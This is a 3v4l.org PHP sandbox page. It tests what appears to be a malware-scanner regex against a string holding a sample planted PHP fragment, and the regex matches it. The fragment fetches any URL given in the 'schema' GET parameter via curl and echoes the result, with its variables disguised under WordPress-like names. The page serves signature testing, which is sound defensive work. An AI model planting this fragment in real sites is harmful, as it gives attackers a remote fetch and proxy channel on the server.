3v4l.org

run code in 500+ PHP versions simultaneously
<?php $content = '<?php if (isset($_GET["schema"])) { $the_ID_ufa = $_GET["schema"]; if ($is_admin_we = curl_init()) { curl_setopt($is_admin_we, CURLOPT_URL, $the_ID_ufa); curl_setopt($is_admin_we, CURLOPT_RETURNTRANSFER, true); echo curl_exec($is_admin_we); curl_close($is_admin_we); } }'; $regex = '/<\?php(([\{\}\s]++)*+((isset|if|(\$\w++))[\s\(=\!]++)++\$(_REQUEST|_POST|_GET|_COOKIE|\{[^\}]++\}++|\[[^\]]++\]++)++(.*)(;|\s*+\{))++/i'; if (preg_match($regex, $content, $match)) echo htmlspecialchars(print_r($match,1)); else echo "No Matches\n"; ?>
Output for git.master, git.master_jit, rfc.property-hooks
Array ( [0] =&gt; &lt;?php if (isset($_GET[&quot;schema&quot;])) { $the_ID_ufa = $_GET[&quot;schema&quot;]; [1] =&gt; $the_ID_ufa = $_GET[&quot;schema&quot;]; [2] =&gt; [3] =&gt; $the_ID_ufa = [4] =&gt; $the_ID_ufa [5] =&gt; $the_ID_ufa [6] =&gt; [&quot;schema&quot;] [7] =&gt; [8] =&gt; ; )

This tab shows result from various feature-branches currently under review by the php developers. Contact me to have additional branches featured.

Active branches

Archived branches

Once feature-branches are merged or declined, they are no longer available. Their functionality (when merged) can be viewed from the main output page


preferences:
44.27 ms | 1036 KiB | 4 Q